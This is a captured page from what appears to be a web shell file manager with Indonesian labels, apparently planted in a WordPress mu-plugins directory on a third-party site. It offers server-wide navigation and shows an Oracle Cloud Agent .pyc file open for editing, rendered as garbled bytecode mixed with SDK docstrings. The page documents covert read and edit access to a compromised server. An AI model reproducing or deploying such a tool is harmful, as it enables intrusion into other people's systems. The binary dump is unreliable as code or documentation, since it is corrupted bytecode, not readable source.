📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
disaster_recovery
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/disaster_recovery/models
💾
Free:
45.7 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: run_object_store_script_user_defined_step.pyc
a N��f� � @ sD d dl mZ ddlmZmZmZ ddlmZ eG dd� de��ZdS )� )�DrPlanUserDefinedStep� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s~ e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z d d� Z dd� Zdd� ZdS )�#RunObjectStoreScriptUserDefinedStepz/ Run Object Store Script step details. c K sB ddddd�| _ ddddd�| _d| _d| _d| _d| _d | _dS ) a� Initializes a new RunObjectStoreScriptUserDefinedStep object with values from keyword arguments. The default value of the :py:attr:`~oci.disaster_recovery.models.RunObjectStoreScriptUserDefinedStep.step_type` attribute of this class is ``RUN_OBJECTSTORE_SCRIPT`` and it should not be changed. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param step_type: The value to assign to the step_type property of this RunObjectStoreScriptUserDefinedStep. Allowed values for this property are: "RUN_OBJECTSTORE_SCRIPT_PRECHECK", "RUN_LOCAL_SCRIPT_PRECHECK", "INVOKE_FUNCTION_PRECHECK", "RUN_OBJECTSTORE_SCRIPT", "RUN_LOCAL_SCRIPT", "INVOKE_FUNCTION" :type step_type: str :param run_on_instance_id: The value to assign to the run_on_instance_id property of this RunObjectStoreScriptUserDefinedStep. :type run_on_instance_id: str :param run_on_instance_region: The value to assign to the run_on_instance_region property of this RunObjectStoreScriptUserDefinedStep. :type run_on_instance_region: str :param object_storage_script_location: The value to assign to the object_storage_script_location property of this RunObjectStoreScriptUserDefinedStep. :type object_storage_script_location: oci.disaster_recovery.models.ObjectStorageScriptLocation �str�ObjectStorageScriptLocation)� step_type�run_on_instance_id�run_on_instance_region�object_storage_script_location�stepType�runOnInstanceId�runOnInstanceRegion�objectStorageScriptLocationN�RUN_OBJECTSTORE_SCRIPT)� swagger_types� attribute_map� _step_type�_run_on_instance_id�_run_on_instance_region�_object_storage_script_location)�self�kwargs� r ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/disaster_recovery/models/run_object_store_script_user_defined_step.py�__init__ s ��z,RunObjectStoreScriptUserDefinedStep.__init__c C s | j S )aO Gets the run_on_instance_id of this RunObjectStoreScriptUserDefinedStep. The OCID of the instance where this script or command should be executed. Example: `ocid1.instance.oc1.phx.exampleocid1` :return: The run_on_instance_id of this RunObjectStoreScriptUserDefinedStep. :rtype: str �r �r r r r r <